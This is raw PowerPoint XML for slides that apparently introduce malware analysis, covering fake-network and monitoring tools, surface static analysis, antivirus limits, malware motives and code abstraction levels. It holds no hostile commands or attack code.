            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>Tools:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>ApateDNS</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0" smtClean="0">
              <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>Netcat</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0" smtClean="0">
              <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>FakeNet</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2526321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Faking a Network</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>ApateDNS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>sdl-apateDNS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0" smtClean="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>www.fireeye.com/services/freeware/apatedns.html</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0" smtClean="0"/>
              <a:t>) </a:t>
            </a:r>
            <a:endParaRPr lang="en-GB"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145049"/>
            <a:ext cx="6621016" cy="4439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59737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Monitoring</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>Netcat</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Monitoring common ports used by malwares (80, 443, …)</a:t>
            </a:r>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34" y="3356992"/>
            <a:ext cx="8867921" cy="172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12637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Monitoring</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>INetSim</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>www.inetsim.org</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>): Linux-based app</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988841"/>
            <a:ext cx="5786970" cy="4090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34415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Monitoring</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Wireshark</a:t>
            </a:r>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72815"/>
            <a:ext cx="7173576" cy="5085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7253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Surface and Dynamic Analysis</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Lab03-01</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2042419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Analysis</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Surface Analysis is one of simple and basic static analysis</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Scanning</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>www.virustotal.com</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0">
              <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Packed or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Obfuscated detector</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1">
                <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>PEiD</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0">
              <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>String contained</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Strings</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Hashing check</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>md5deep </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-GB" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="35933030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Analysis</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Anti-virus</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>A good first step to run a prospective malware through multiple antivirus programs to identify if it is an actual malware or not.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>An antivirus program is based on a database of file signatures; behavioural and pattern-matching analysis (heuristic) to identify suspect files.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Disadvantages:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>A malware code changed -&gt; file signatures changed.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Out-of-date database</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>H</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>euristic techniques can be bypassed by new and unique malware</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="9367947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Static Analysis</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Different antivirus program use different signatures and heuristics</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>E.g.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>www.virustotal.com</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="841890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Existence &amp; Motivation </a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Existence: perceived as the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>tool</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> or the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>weapon</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> of an </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>individual, organization </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>intending an unethical or illegal act concerning computers and data</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Motivations:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>to wreck havoc: playing a prank, crash PCs, domain unavailable, etc.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>gain </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>profit: spam sending as a service, stealing financial or personal data, etc.</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="23244212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Disassembly</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0" smtClean="0"/>
              <a:t>Level of Abstraction</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Rectangle 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5724128" y="2420888"/>
            <a:ext cx="242599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5723430" y="2679303"/>
            <a:ext cx="1590500" cy="923330"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>push </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ebp</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>m</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ove </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ebp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>esp</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sub </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>esp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, 0x40</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rectangle 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1187624" y="2420888"/>
            <a:ext cx="242599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186926" y="2679303"/>
            <a:ext cx="2426690" cy="923330"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> c;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>printf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(“Hello World\n”);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>exit(0);</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Rectangle 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3543265" y="4829111"/>
            <a:ext cx="242599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4072045" y="5055567"/>
            <a:ext cx="999504" cy="923330"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>55</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>8B EC</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>8B EC 40</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="TextBox 11"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1389221" y="1737682"/>
            <a:ext cx="2022798" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Malware writer</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>High-level language</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="TextBox 12"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5996167" y="1737681"/>
            <a:ext cx="1978619" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Malware analyst</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Low-level language</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="TextBox 13"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3771586" y="4182780"/>
            <a:ext cx="1510029" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>CPU </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Machine code</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="Down Arrow 16"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="19312411">
            <a:off x="2433970" y="3896309"/>
            <a:ext cx="325996" cy="15841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Down Arrow 17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="12970652">
            <a:off x="6687157" y="3832399"/>
            <a:ext cx="265049" cy="15841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1327637" y="4628544"/>
            <a:ext cx="1037463" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Complier</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="TextBox 19"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6875484" y="4686235"/>
            <a:ext cx="2242730" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
